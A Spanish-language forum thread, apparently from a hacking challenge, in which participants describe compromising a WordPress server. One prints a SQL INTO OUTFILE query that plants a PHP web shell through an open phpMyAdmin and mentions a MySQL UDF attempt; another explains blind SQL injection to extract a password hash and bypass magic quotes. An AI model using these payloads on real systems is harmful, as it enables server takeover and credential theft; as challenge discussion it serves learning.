dimitrix , saca los permisos ... Danos un poco mas de tiempo. Ando en algo. Dejalo sin permisos.

Pues a sido un poco lamer por que como esta el phpmyadmin abierto y puediendo meter sql a saco es facil.

Nada mas decir que has dado una carpeta con files he pensado en varias y ma dao por buscar la famosa uploads que no existia y de repente lista.

Despues desde phpmyadmin he metido la siguiente select:

SELECT '<?php if(isset($_REQUEST[\"cmd\"])){ $cmd = ($_REQUEST[\"cmd\"]);system($cmd);die;}?>'
INTO OUTFILE  '/var/www/wp-content/uploads/c.php'

Lo que hace es crear un fichero php con el siguiente contenido:

<?php 
if(isset($_REQUEST["cmd"])){
   $cmd = ($_REQUEST["cmd"]);
   system($cmd);
   die;
}
?>
 

Y nada una cmd, que podria haber sido una c99 codeada o lo que quisiera... pero claro con phpmyadmin abierto y permisos de escritura.

Pero bueno antes de que pusieras permisos me tirao un rato intentando colar la libreria UDF pero no ha habido suerte... he creado las funciones base64 y copiado a tmp el lib*.so para despues intentar como pudiese apuntar que la carpeta de plugins de mysql fuera tmp pero nada

jajajajaja esque a veces uno se aburre pos xD

Puff, todo por el SQL xD y yo buscando donde colarme en el wordpress LOL.

Estoy obteniendo el hash con la clave del primer usuario de la tabla de usuarios caracter por caracter:


Luego cambio la letra "a" por "b", c d e f g h i, etc, hasta obtener el hash completo ya que cuando el select está bien muestra un mensaje que dice que el post está duplicado pero cuando hay un error el script continua y aparece un error de sql sobre el insert asi que con substring puedes ir devolviendo verdadero o falso cuando encuentres un carácter válido en el hash de la contraseña, luego a loguearse y luego a ejecutar el código arbitrario o usar la librería de backups vulnerable del wordpress para obtener datos sensibles.

PD: php usa magic quotes, por eso no funcionan las inyecciones con comillas, para evadir eso usamos concat() y char().